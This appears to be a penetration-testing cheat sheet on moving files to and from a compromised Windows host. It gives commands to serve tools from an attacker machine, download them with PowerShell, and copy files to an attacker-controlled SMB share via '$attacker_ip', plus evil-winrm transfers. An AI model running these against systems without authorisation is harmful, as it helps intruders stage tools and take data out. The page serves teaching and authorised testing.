#Windows Security #Post-exploitation #File Transfer

File Transfer

Once a system is compromised, the attacker very often needs to transfer a tool to the victim's system or download a file from it. Uploaded files are usually tools for further privilege escalation, credential harvesting or lateral movement. Downloaded files are mostly logs and output from tools.

From attacker to victim (upload)

Simple HTTP server

Attacker:

# Start HTTP server (directory listing of the current directory)
python -m http.server $port

Victim:

# Download file from URL
Invoke-WebRequest $url -OutFile $output_file
 
# Aliases of Invoke-WebRequest (wget/iwr exist in Windows PowerShell; the wget alias was removed in PowerShell 6+)
wget $url -OutFile $output_file
iwr $url -OutFile $output_file
 
# Alternative way (no dependency on Invoke-WebRequest, works in older PowerShell versions)
(New-Object System.Net.WebClient).DownloadFile($url, $output_file)

IMPORTANT: It may be worth checking file integrity after the download by comparing an MD5 hash: Get-FileHash $file -Algorithm MD5
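The integrity check above, wrapped into a single download-and-verify step, as an added example that is not part of the original page: the function name Get-VerifiedFile, and the placeholders $Url, $OutFile and $ExpectedHash, are assumptions; the expected hash is computed on the sending side beforehand.

```powershell
# Added example: download a file over HTTP and refuse to keep it if its hash
# does not match the value computed on the sending side.
# Get-VerifiedFile and its parameters are placeholders chosen for this example.
function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [Parameter(Mandatory)] [string] $OutFile,
        [Parameter(Mandatory)] [string] $ExpectedHash,
        # The page uses MD5; SHA256 is the stronger default when both sides support it
        [ValidateSet('MD5', 'SHA256')] [string] $Algorithm = 'SHA256'
    )

    # -UseBasicParsing avoids the Internet Explorer engine dependency on older Windows PowerShell
    Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing

    # Get-FileHash returns upper-case hex; -ne compares case-insensitively by default
    $actual = (Get-FileHash -Path $OutFile -Algorithm $Algorithm).Hash

    if ($actual -ne $ExpectedHash) {
        # Truncated or altered transfer: remove the file instead of running it
        Remove-Item -Path $OutFile -Force
        throw "Hash mismatch for $OutFile (expected $ExpectedHash, got $actual)"
    }

    Write-Host "Verified $OutFile ($Algorithm $actual)"
    return $true
}

# Usage with placeholder values (braces keep ':' from being parsed as a scope qualifier):
# Get-VerifiedFile -Url "http://${attacker_ip}:${port}/tool.exe" `
#                  -OutFile "$env:TEMP\tool.exe" -ExpectedHash "<sha256-of-tool.exe>"
```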

Bidirectional

Simple SMB server

Attacker:

impacket-smbserver -smb2support -username $user -password $pass $share_name $mount_dir

Victim:

# Authenticate yourself against the share
net use \\$attacker_ip\$share /user:$user $pass
 
# Send to attacker
copy $file \\$attacker_ip\$share\
 
# Download from attacker
copy \\$attacker_ip\$share\$file $path

Existing SMB share

If there is some SMB share running on the victim's machine and you have access to it from both sides (attacker and victim), then you can use it to conveniently transfer files both ways.

Evil-WinRM

The evil-winrm tool can transfer files out of the box as soon as a session is established.

Attacker (Evil-WinRM CLI):

> download $remote_file [$local_path]
> upload $local_file [$remote_path]

C2 Frameworks

Practically every C2 framework has a built-in file transfer feature. Check the documentation of the C2 framework you are using.
